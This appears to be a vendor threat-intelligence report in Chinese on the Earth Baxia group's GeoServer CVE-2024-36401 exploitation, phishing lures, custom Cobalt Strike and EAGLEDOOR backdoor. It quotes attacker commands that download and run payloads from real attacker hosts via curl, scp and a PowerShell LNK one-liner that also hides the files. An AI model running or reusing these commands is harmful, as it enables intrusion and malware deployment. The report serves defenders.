APT & 針對式目標攻擊
Earth Baxia 利用 GeoServer 漏洞,鎖定亞太政府及電信業者,台灣也成目標
趨勢科技觀察到 Earth Baxia 駭客集團使用了像魚叉式網路釣魚與客製化惡意程式這類的進階技巧,對亞太地區國家發動針對性攻擊,據資料顯示,該集團疑似來自中國。
摘要
- Earth Baxia 駭客集團利用魚叉式網路釣魚郵件和 GeoServer 的 CVE-2024-36401 漏洞攻擊台灣的政府機關,而且可能還有其他亞太地區 (APAC) 國家受害。
- CVE-2024-36401 是一個遠端程式碼執行漏洞,可讓駭客下載或複製惡意元件。
- 駭客為了降低企業的防備,會利用 GrimResource 和 AppDomainManager 這類程式碼注入技巧來部署其他的惡意檔案。
- 駭客會經由兩種突破防線的管道,將客製化 Cobalt Strike 元件部署在已遭入侵的電腦上,這個修改過的 Cobalt Strike 版本修改了它的內部特徵,並變更了組態設定的結構來躲避偵測。
- 此外,Earth Baxia 還使用了一個新的後門程式叫「EAGLEDOOR」,此程式支援多種通訊協定,用來蒐集資訊並派送惡意檔案。
今年 7 月,我們發現 Earth Baxia 駭客集團針對台灣的政府機關發動了一波可疑的行動,可能還瞄準了亞太地區其他國家。在這些行動中,Earth Baxia 使用了魚叉式網路釣魚郵件並利用開放原始碼地理空間資料分享伺服器 GeoServer 的 CVE-2024-36401 漏洞來突破防線,將客製化 Cobalt Strike 元件部署到已遭入侵的電腦上。此外,我們也發現了一個可支援多種通訊協定的新後門程式,名叫「EAGLEDOOR」。本文討論駭客的感染程序,並詳細分析其用到的惡意程式。
駭客溯源與受害者分析
經過調查之後,我們發現有多台伺服器是架設在阿里巴巴的雲端服務上,或者位於香港,而且有些相關樣本是從中國送交到 VirusTotal。在檢查了駭客集團在 Shodan 上使用的其中一個 Cobalt Strike 浮水印 (666666) 之後,我們也發現只有少數電腦與這個浮水印有所關聯,其中大部分位於中國 (表 1)。因此,我們懷疑這些行動背後的 APT 集團應該來自中國。
| 國家 | 電腦數量 |
| 中國 | 13 |
| 日本 | 1 |
| 新加坡 | 1 |
根據我們蒐集到的網路釣魚郵件、誘餌文件,以及我們對事件的觀察,被鎖定的目標似乎主要是政府機關、電信業者,以及菲律賓、南韓、越南、台灣和泰國的能源產業 (圖 1)。值得注意的是,我們也發現了一份以簡體中文撰寫的誘餌文件,顯示中國也是受害國家之一。但由於資訊有限,我們無法確切判斷哪些中國的產業受到影響。
感染過程
本節討論我們從監測資料所看到的駭客攻擊流程,包括其惡意程式以及攻擊的手法、技巧與程序 (TTP),如圖 2 所示。
突破防線
含有漏洞的 GeoServer
在某些情況下,Earth Baxia 會利用 GeoServer 的 CVE-2024-36401 遠端程式碼執行 (RCE) 漏洞來執行任意指令。根據我們的調查顯示,他們使用了「curl」和「scp」這類指令來下載或複製惡意元件到受害環境當中,然後再利用 RCE 漏洞來執行這些元件 (表 2)。
以下是使用 curl 來下載檔案的指令:
curl --connect-timeout 3 -m 10 -o c:\windows\temp\{file name} http://167[.]172[.]89[.]142/{file name}
以下是使用 scp 從遠端複製檔案的指令:
cmd /c "scp -P 23 -o StrictHostKeyChecking=no -o ConnectTimeout=3 -o UserKnownHostsFile=C:\windows\temp\ t1sc@152[.]42[.]243[.]170:/tmp/bd/{file name} c:\windows\temp\"
| 檔案名稱 | 說明 |
| Edge.exe | 用來載入 msedge.dll 的合法執行檔。 |
| msedge.dll | 用來啟動 Cobalt Strike (Logs.txt) 的惡意載入器 (SWORDLDR)。 |
| Logs.txt | 客製化 Cobalt Strike shellcode。 |
魚叉式網路釣魚郵件攻擊管道
Earth Baxia 在 8 月初便開始利用網路釣魚郵件來發動攻擊。其中一名受害者通報表示大約在兩週內收到了 70 多封網路釣魚郵件。此外,我們也在 VirusTotal 上發現了類似的電子郵件附件檔案。根據誘餌文件的分析顯示,駭客可能不只攻擊台灣,還攻擊了越南和中國。
絕大多數電子郵件主旨都經過精心設計且內容都不同,而隨附的 ZIP 檔案則內含一個誘餌檔案 (MSC 檔),我們將它命名為「RIPCOY」。此時如果使用者點兩下這個檔案,其內嵌且加密編碼的 VBScript 會試圖使用一種名為「GrimResource」的技巧從某個公有雲服務 (通常是 Amazon Web Services [AWS]) 下載多個檔案,這些檔案包括:一個誘餌 PDF 文件、一些 .NET 應用程式,以及一個組態設定檔案。
接著,由 MSC 檔案植入的 .NET 應用程式和組態設定檔案會使用一種叫作「AppDomainManager 注入」的技巧,此技巧可注入一個客製化應用程式領域 (AppDomain) 到某個應用程式的處理程序內,來執行任意程式碼。這樣就能執行任何 .NET 應用程式,然後用它來從本機或遠端網站載入一個任意的受管理 DLL (managed DLL),而不須直接呼叫任何 Windows API (圖 3)。
合法的 .NET 應用程式接著根據 .config 檔案內指定的網址去下載下一階段的下載器,也就是一個 .NET DLL 檔案 (圖 4)。這個下載網址使用了 Base64 編碼與 AES 加密。此一階段用到的下載網站絕大多數都是架設在公有雲服務上,通常是「阿里雲」。一旦 DLL 讀取到 shellcode 之後,就會使用 CreateThread API 來將它執行,而且所有程序都在記憶體內完成。
這段 shellcode 會蒐集受害電腦的資訊,包括:使用者名稱、電腦名稱、父處理程序 (合法的 .NET 應用程式) 以及記憶體狀態。它會將這些資訊當成「client_id」參數附加到一個網址,然後傳送至一個自訂網域。此時可能會從伺服器收到一個 64 字元的回應,接著再向該網址請求下一個惡意檔案 (圖 5)。不過,我們並未蒐集到最終的惡意檔案。
這個 shellcode 看來似乎有幾個特點:
- 駭客會使用「s3cloud-azure」或「s2cloud-amazon」這類名稱將其網域偽裝成好像知名的公有雲服務。每個網路請求都有特定的模式,包括一個獨特的 user-agent 字串,並採用 JSON 格式的資料。
- 下載程序的最後階段會固定使用「/api/v1/homepage/」這個路徑,顯示該檔案很可能還是存放在第三方雲端服務上。
- 將檔案放在雲端代管,對駭客的優點是能輕鬆更換或更新檔案,包括內含不同下載連結的 .config 檔案,使其活動更不容易被追蹤。
儘管我們不確定最終的 shellcode 是什麼,但我們的監測資料卻顯示 MSC 檔案所啟動的「oncesvc.exe」會執行另一個處理程序「Edge.exe」來載入 Cobalt Strike 元件 msedge.dll 和 Logs.txt。接下來,我們將進一步討論這些元件。
後門程式分析
Cobalt Strike
Earth Baxia 利用 DLL 側載來執行 Cobalt Strike shellcode (圖 6)。為了躲避防禦,這個 shellcode 載入器 (也就是「SWORDLDR」) 會解開惡意檔案,然後根據其內嵌的組態設定將惡意檔案注入指定的處理程序 (圖 7)。
被注入的 shellcode 是一個客製化的 Cobalt Strike,有別於一般的 Cobalt Strike 惡意程式,修改後的版本 MZ 標頭已經被移除,內部特徵也經過修改 (圖 8)。此外,組態設定的結構也稍有改變 (圖 9)。
EAGLEDOOR
以下是我們在受害者端蒐集到的樣本:
- Systemsetting.dll (EAGLEDOOR 載入器)
- Systemsetting.exe
這些樣本是 EAGLEDOOR 的元件,由前述的 Cobalt Strike 處理程序所植入並啟動。
駭客會利用 DLL 側載來啟動載入器,然後在記憶體內執行 EAGLEDOOR。在載入器的資料 (.data) 區段含有兩個加密的 DLL 檔案:
Hook.dll
此模組用於透過匯出函式「MyCreateHook」來鉤掛 (hook) 特定 API,藉此攔截一些經常被呼叫的 API (圖 10)。一旦鉤掛的 API 被呼叫到,就會執行 Eagle.dll 惡意模組。
Eagle.dll
啟動 Eagle.dll 的程式碼流程如下所示,載入器會在記憶體內將這個模組解密,然後執行其第一個匯出函式「RunEagle」(圖 11)。
EAGLEDOOR 支援四種與 CC 伺服器通訊的方法:
- DNS
- HTTP
- TCP
- Telegram
根據分析,TCP、HTTP 和 DNS 通訊協定用於將受害電腦的狀態傳送至 CC 伺服器,而主要的後門功能則是透過 Telegram 通訊協定經由 Bot API 來達成,其用到的方法 (函式) 如下:
- getFile
- getUpdates
- sendDocument
- sendMessage
這些方法可用來蒐集資訊、派送檔案,並且在受害系統上執行下一個惡意檔案。不過,在此案例中我們只蒐集到受害者端的 TCP 和 HTTP 通訊協定相關樣本。因此,我們將持續監控該頻道來追蹤駭客接下來的 Telegram 通訊。
資料外傳
根據我們的調查,我們發現 Earth Baxia 會將蒐集到的資料壓縮,並利用 curl.exe 將資料外傳。圖 12 顯示經由 curl 將資料外傳至駭客檔案伺服器 (152[.]42[.]243[.]170) 的情況。
進一步觀察
絕大多數的網路釣魚郵件都是使用附件檔來引誘使用者上當,但根據我們的監測資料,有些網路釣魚郵件會發送一個網路釣魚網址來讓使用者下載 ZIP 檔案。就目前所知,這波行動突破防線的方式有四種可能的組合,如圖 13 所示。MSC 檔案和 LNK 檔案都可用來派送其用到的兩組工具。
在調查此案件時,我們在一個 LNK 檔案中發現了「static[.]krislab[.]site」這個下載網站,該檔案會執行 PowerShell 指令來下載誘餌文件和 Cobalt Strike 工具,包括:Edge.exe、msedge.dll 和 Logs.txt (表 3)。這組工具跟本文前面提到的工具類似。
每個 ZIP 檔都包含一個 LNK 檔案,內含要執行的 PowerShell 指令:
wget -Uri https://static.krislab.site/infodata/msedge.dll -OutFile C:\Users\Public\msedge.dll; wget -Uri http s://static.krislab.site/infodata/Logs.txt -OutFile C:\Users\Public\Logs.txt;wget -Uri https://static.krislab.site/infoda ta/Edge.exe -OutFile C:\Users\Public\Edge.exe;C:\Users\Public\Edge.exe;wget -Uri "https://static.krislab.site/infodata/yn.pdf" -OutFile "C:\Users\Public\邀請函.pdf";C:\Windows\System32\cmd.exe /c start /b "C:\Users\Public\邀請函.pdf";attrib +s +h C:\Users\Public\Edge.exe;attrib +s +h C:\Users\Public\Logs.txt;attrib +s +h C:\Users\Public\msedge.dll
| 發現日期 | 路徑 | 檔案說明 |
| 2024 年 6 月 21 日 | /infodata/Invitation1017.zip | Cobalt Strike 工具 |
| /infodata/Edge.exe | ||
| /infodata/msedge.dll | ||
| /infodata/Logs.txt | ||
| /infodata/tw.pdf | 誘餌文件 | |
| 2024 年 6 月 25 日 | /infodata/break_1/06.pdf | 誘餌文件 |
| 2024 年 6 月 30 日 | /infodata/Invitation0630.zip | Cobalt Strike 工具 |
| /infodata/Edge.exe | ||
| /infodata/msedge.dll | ||
| /infodata/Logs.txt | ||
| /infodata/yn.pdf | 誘餌文件 | |
| 2024 年 7 月 2 日 | /infodata/Invitation0702.zip | Cobalt Strike 工具 |
| /infodata/Edge.exe | ||
| /infodata/msedge.dll | ||
| /infodata/Logs.txt | ||
| /infodata/hzm.pdf | 誘餌文件 | |
| 2024 年 8 月 15 日 | /infodata/Edge.exe | Cobalt Strike 工具 |
| /infodata/msedge.dll | ||
| /infodata/Logs.txt | ||
| /infodata/k1.pdf | 誘餌文件 |
Trend Vision One 威脅情報
要隨時掌握持續演變的威脅,趨勢科技客戶可從 Trend Vision One 內部取得各種情報與威脅洞見。Threat Insights 可幫助客戶在威脅發生之前便提前掌握,並對新興的威脅預先做好準備。這些洞見提供了有關駭客、惡意活動及駭客技巧的完整資訊。善用這些情報,客戶就能主動採取步驟來保護自己的環境、防範風險,並且有效回應威脅。
Trend Vision One Intelligence Reports 應用程式 [IoC 掃描]
- Earth Baxia 駭客集團利用魚叉式網路釣魚與 GeoServer 漏洞攻擊亞太地區
- Earth Baxia:深入分析其八月份的猛烈攻擊行動
Trend Vision One Threat Insights 應用程式
追蹤查詢
Trend Vision One Search 應用程式
Vision One 客戶可以使用 Search 應用程式來尋找或追蹤本文提到的惡意指標,看看是否也出現在自己的環境中。
與 Earth Baxia 的網路通訊 - IP
eventId:3 AND (src:"167.172.89.142" OR src:"167.172.84.142" OR src:"152.42.243.170" OR src:"188.166.252.85" OR dst:"167.172.89.142" OR dst:"167.172.84.142" OR dst:"152.42.243.170" OR dst:"188.166.252.85")
除此之外,Vision One 客戶還可啟用 Threat Insights 權利來取得更多追蹤查詢。
結論
疑似位於中國的 Earth Baxia 駭客集團發動了一波精密的攻擊行動,瞄準了亞太地區國家的政府機關與能源產業。他們運用一些進階技巧,例如攻擊 GeoServer 的漏洞、魚叉式網路釣魚郵件,以及客製化惡意程式 (Cobalt Strike 和 EAGLEDOOR) 來執行滲透並將資料外傳。從他們利用公有雲服務來代管惡意檔案,並使用支援多重通訊協定的 EAGLEDOOR 惡意程式來看,其營運的複雜性與適應能力應該相當不錯。
要防範這類威脅,最重要的關鍵就是隨時保持警戒,並採取進階威脅偵測手段。此外,資安團隊也可採取以下最佳實務原則來防範這類威脅的風險:
- 定期舉辦員工網路釣魚意識訓練。
- 仔細檢查電子郵件的寄件人和主旨,尤其是來源不熟悉或主旨含糊的電子郵件。
- 部署多層式防護,以便能在惡意程式感染過程的早期階段加以偵測及攔截。
企業可採用 Trend Vision One™ 來防範這類攻擊,它能讓資安團隊持續發掘企業的攻擊面,全面保護已知、未知、受管理及未受管理的網路資產。Vision One 能協助企業判斷潛在風險 (例如漏洞) 的優先次序並盡快解決。它會參考各項關鍵因素,例如潛在攻擊的可能性和衝擊,同時還提供各式各樣的防護、偵測及回應功能。Vision One 提供的多層式防護與行為偵測,能在使用者的電腦和系統遭到危害之前預先攔截惡意工具和服務。
入侵指標 (IoC)
如需完整的入侵指標 (IoC) 清單,請至此處。